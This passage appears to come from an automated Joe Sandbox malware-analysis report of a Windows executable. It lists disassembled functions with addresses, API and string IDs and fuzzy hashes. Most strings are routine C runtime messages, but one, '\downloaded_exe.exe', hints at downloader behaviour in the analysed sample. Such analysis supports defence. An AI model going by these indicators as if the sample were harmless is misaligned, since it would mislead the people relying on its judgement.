                                                        • Opcode ID: 9ee6e1627b5bd20c3a521e1cfa2d24bf4848b79f21d8df97e8ed46e0eaf6a0b5
                                                        • Instruction ID: 7cbac336827287b1d8ebb529f83205d917736da2079b424f438122cb7dc73c6e
                                                        • Opcode Fuzzy Hash: 9ee6e1627b5bd20c3a521e1cfa2d24bf4848b79f21d8df97e8ed46e0eaf6a0b5
                                                        • Instruction Fuzzy Hash: ADF0F852B0D30A40BE59B7666E920FA8A465F49BC0BC48435DD0D1B78AEEACE043C324
                                                        Function 00007FF7020CF420 Relevance: 5.4, APIs: 4, Instructions: 364stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memcpystrlen
                                                        • String ID:
                                                        • API String ID: 3111578849-0
                                                        • Opcode ID: 3d90869f47d59b144a5cd361fbe4e5350f12669ff86961f0600ace6322520491
                                                        • Instruction ID: 9c6444b78c201c7b2a5e9353a51e370b2101653178509d010c8d1616ab592b14
                                                        • Opcode Fuzzy Hash: 3d90869f47d59b144a5cd361fbe4e5350f12669ff86961f0600ace6322520491
                                                        • Instruction Fuzzy Hash: BCF18FA3A08B4685DE50AF69E84416DEB61FF84BE4F904233EE5D47BA4DFACD440C325
                                                        Function 00007FF7020CEBC0 Relevance: 5.4, APIs: 4, Instructions: 364stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memcpystrlen
                                                        • String ID:
                                                        • API String ID: 3111578849-0
                                                        • Opcode ID: 3ee1f6cb060ff85924ce43b0ca4f68a921c97431d5db957a8e4d9afcb58b48e4
                                                        • Instruction ID: cf714dd8de11c9f73c24fe0ad50e88e52b483b37a48bab9a4f5c3b4493040d15
                                                        • Opcode Fuzzy Hash: 3ee1f6cb060ff85924ce43b0ca4f68a921c97431d5db957a8e4d9afcb58b48e4
                                                        • Instruction Fuzzy Hash: FBF1AFA3608B4685DE50EF29E88416DEB61FF84BE4F904232EE5D47BA4DFACD401C324
                                                        Function 00007FF70203CDD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \downloaded_exe.exe
                                                        • API String ID: 0-1839852069
                                                        • Opcode ID: 4668417b058ce3d0c34cc2732f819333020550af68d18917dcf5ecaff657a6be
                                                        • Instruction ID: 4e942dd22de4c182f7822c4d902157c72a1b1583a26ae7030b4ee08ff558cfd1
                                                        • Opcode Fuzzy Hash: 4668417b058ce3d0c34cc2732f819333020550af68d18917dcf5ecaff657a6be
                                                        • Instruction Fuzzy Hash: 9831B563F1D70646FB29AB19AE40379AA89AF447C4F848037D90DD7794DFBCA842C325
                                                        Function 00007FF7020CE380 Relevance: 5.4, APIs: 4, Instructions: 351stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen$memcpy
                                                        • String ID:
                                                        • API String ID: 3396830738-0
                                                        • Opcode ID: 06ab67271976276e732711bdd9659451584a9c4ff42f45fd88c6233efcd92161
                                                        • Instruction ID: 2a5cef76884467a2c2ddd1f582c8ae7c4480799303f5c90d61870c95ffd62bc5
                                                        • Opcode Fuzzy Hash: 06ab67271976276e732711bdd9659451584a9c4ff42f45fd88c6233efcd92161
                                                        • Instruction Fuzzy Hash: 2BF192A7B08B8686DA50EF19D84016EAB61FF84BD4F944132EE5D07BA5DFBCD400C364
                                                        Function 00007FF7020CDB40 Relevance: 5.4, APIs: 4, Instructions: 351stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen$memcpy
                                                        • String ID:
                                                        • API String ID: 3396830738-0
                                                        • Opcode ID: e6ecef0ffc95315cde2b9f23fc29576cd86915b0c054d12fe14a391318044fb1
                                                        • Instruction ID: 0bf82f807d1c30972ced012b2f14a431c7b7fad62fd47562aed3b1f5bd28cc9c
                                                        • Opcode Fuzzy Hash: e6ecef0ffc95315cde2b9f23fc29576cd86915b0c054d12fe14a391318044fb1
                                                        • Instruction Fuzzy Hash: F5F193A3A08B8A85DA50EF59E84026EEB61FF84BD4F944132EE5D077A4DFBCD441C364
                                                        Function 00007FF702042CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: FormatFreeLocalMessage
                                                        • String ID: basic_string: construction from null is not valid
                                                        • API String ID: 1427518018-2991274800
                                                        • Opcode ID: 2712f3d2f44322e34fb66e92be80a74d0c9a4474e05207e38c8fb3f2eef9aa77
                                                        • Instruction ID: a8a17bfec05d00f6e576999f386fdda75fc19900c24c43ad3b54ed77d7f6406d
                                                        • Opcode Fuzzy Hash: 2712f3d2f44322e34fb66e92be80a74d0c9a4474e05207e38c8fb3f2eef9aa77
                                                        • Instruction Fuzzy Hash: 36316BB3B19B0685EB50AF25E8443AEABA0EF44B84F948132EE4D47794DFBCE445C354
                                                        Function 00007FF70203BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: %p not found?!?!
                                                        • API String ID: 383729395-11085004
                                                        • Opcode ID: 51bfca0288ef26d4bb1cc73e50e6331fc9062d5f776021509f32ff513a4e5710
                                                        • Instruction ID: ff85be0ae4f0c698305b51d5f2dc9aaeea2aabbea7cf1d66c2f241bb1dc77841
                                                        • Opcode Fuzzy Hash: 51bfca0288ef26d4bb1cc73e50e6331fc9062d5f776021509f32ff513a4e5710
                                                        • Instruction Fuzzy Hash: BC118123B4D70A85E9257B16AE502BCBE98AF44BCCF881434CD0D4A794DFACA481C768
                                                        Function 00007FF70202FDD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentTerminate
                                                        • String ID: *** stack smashing detected ***: terminated
                                                        • API String ID: 2429186680-3581952252
                                                        • Opcode ID: a8c73e8b66db735e6569f109827d40200f9a8ba41aa302fef30235c10d7a2edf
                                                        • Instruction ID: b55b1db4f8f9278a69be78153b62a344f237d537d4e20a1223043e25f866ce18
                                                        • Opcode Fuzzy Hash: a8c73e8b66db735e6569f109827d40200f9a8ba41aa302fef30235c10d7a2edf
                                                        • Instruction Fuzzy Hash: BF11A557F0D68646F6516B287C69278AE95AF51705FC5407AC74C473C2DFEC6804C362
                                                        Function 00007FF70202E230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 79423b85b4423577eb17af57a89cbd99288db31a12fe7f310d6e64f2ccccfe01
                                                        • Instruction ID: 9f67e3de646e5dfd194d6c6aad45eaf495e1605c2847c9f6af5731021ae086a1
                                                        • Opcode Fuzzy Hash: 79423b85b4423577eb17af57a89cbd99288db31a12fe7f310d6e64f2ccccfe01
                                                        • Instruction Fuzzy Hash: 7001CE23C1CF8882E6019F18DD401BAB730FF6E749F659326EE8C26525CF68E182C704
                                                        Function 00007FF70202F610 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaiseabort
                                                        • String ID: CCG
                                                        • API String ID: 2956646853-1584390748
                                                        • Opcode ID: 30fcc97b0d329164fc8a059501c45aa5248e5052b62625dad0c311f06f1c84ad
                                                        • Instruction ID: d8dd8d9ef4b8536910cde731c9da526049470104569a9211ab2020a5919ba3b8
                                                        • Opcode Fuzzy Hash: 30fcc97b0d329164fc8a059501c45aa5248e5052b62625dad0c311f06f1c84ad
                                                        • Instruction Fuzzy Hash: 7A01A723E14B4686E310AB14D8413B86670FFE974CFB0A326D54C05171DFB9D2E7C240
                                                        Function 00007FF702042DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strerrorstrlen
                                                        • String ID: basic_string: construction from null is not valid
                                                        • API String ID: 960536887-2991274800
                                                        • Opcode ID: 1e9a0162917192b3f7a24b33187b695eed9b18fe4fb9c70bef83578a49083784
                                                        • Instruction ID: 18ede314102323ae463c7ad1473e9c4cf04624871c441afa60855993734b98c4
                                                        • Opcode Fuzzy Hash: 1e9a0162917192b3f7a24b33187b695eed9b18fe4fb9c70bef83578a49083784
                                                        • Instruction Fuzzy Hash: F9E06D52B4A71651E9057A26AC510FD96149F4AB90AC84031DD0D2B752DEACE942C328
                                                        Function 00007FF70202E2D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-2713391170
                                                        • Opcode ID: 6cd6d4a33949c92f2485ba8e07bf5cd2477614c566223353674dd9d9690ccd4a
                                                        • Instruction ID: fda103f564394d9a229ab1624e71a04a87c1292bd418727f5c76aac7b0b146ba
                                                        • Opcode Fuzzy Hash: 6cd6d4a33949c92f2485ba8e07bf5cd2477614c566223353674dd9d9690ccd4a
                                                        • Instruction Fuzzy Hash: 27F0AF1381CF8882D242DF18A8000AAB334FF5D788F555326EE8D26555CF68E586C714
                                                        Function 00007FF70202E2F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-4064033741
                                                        • Opcode ID: 15c8057da2024e78b088c3571ea06f1e685476037c12a9192d4ba8e1982afd8e
                                                        • Instruction ID: d577fafa173e79d41b4011fdcc9845eab865f0ea55f5ce7e48d1c304d953b45f
                                                        • Opcode Fuzzy Hash: 15c8057da2024e78b088c3571ea06f1e685476037c12a9192d4ba8e1982afd8e
                                                        • Instruction Fuzzy Hash: 4FF0AF1381CF8882D242EF18E8000ABB334FF5D788F555326EE8D26555CF68E586C714
                                                        Function 00007FF70202E2E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-4283191376
                                                        • Opcode ID: c7bc306fcc69e4ad690e6ed4b50368af3ebefb5ceb3eafc768cc4363b9c15e1b
                                                        • Instruction ID: 9dddb59f610b48761b883d628d5d00412ca7cc11de99f840faddead89a2f0842
                                                        • Opcode Fuzzy Hash: c7bc306fcc69e4ad690e6ed4b50368af3ebefb5ceb3eafc768cc4363b9c15e1b
                                                        • Instruction Fuzzy Hash: D7F0AF1381CF8882D2429F18A8000AAB734FF5D788F655326EE8D26555CF68E586C714
                                                        Function 00007FF70202E310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-4273532761
                                                        • Opcode ID: f97783a7e4ca908209216aa27327eb0627379e72d28ddb30894927f432f40c76
                                                        • Instruction ID: 4a6ae2e4d8b8e4c1c830737147a085c9e012cf492f2d584c36943a0ba08a98b7
                                                        • Opcode Fuzzy Hash: f97783a7e4ca908209216aa27327eb0627379e72d28ddb30894927f432f40c76
                                                        • Instruction Fuzzy Hash: 50F0AF1381CF8882D2029F18A8000AAB334FF5D788F555326EE8D26551CF68E586C714
                                                        Function 00007FF70202E300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-2187435201
                                                        • Opcode ID: 8c5c6aa6df96553fee89f14627df03a85a3ded7844e9b72df5a7c689c0ed77d2
                                                        • Instruction ID: 5c68b8368576706e97139c417e329645e907424b2d944d96003901e973e206c7
                                                        • Opcode Fuzzy Hash: 8c5c6aa6df96553fee89f14627df03a85a3ded7844e9b72df5a7c689c0ed77d2
                                                        • Instruction Fuzzy Hash: DBF0AF1381CF8882D2429F18E8000AAB334FF9D788F555326EE8D26555CF68E586C714
                                                        Function 00007FF70202E268 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-2468659920
                                                        • Opcode ID: c893aa0bcc44eb6e6ea97f4031d42d54ef2b984fee98845ff48b5471311b7bca
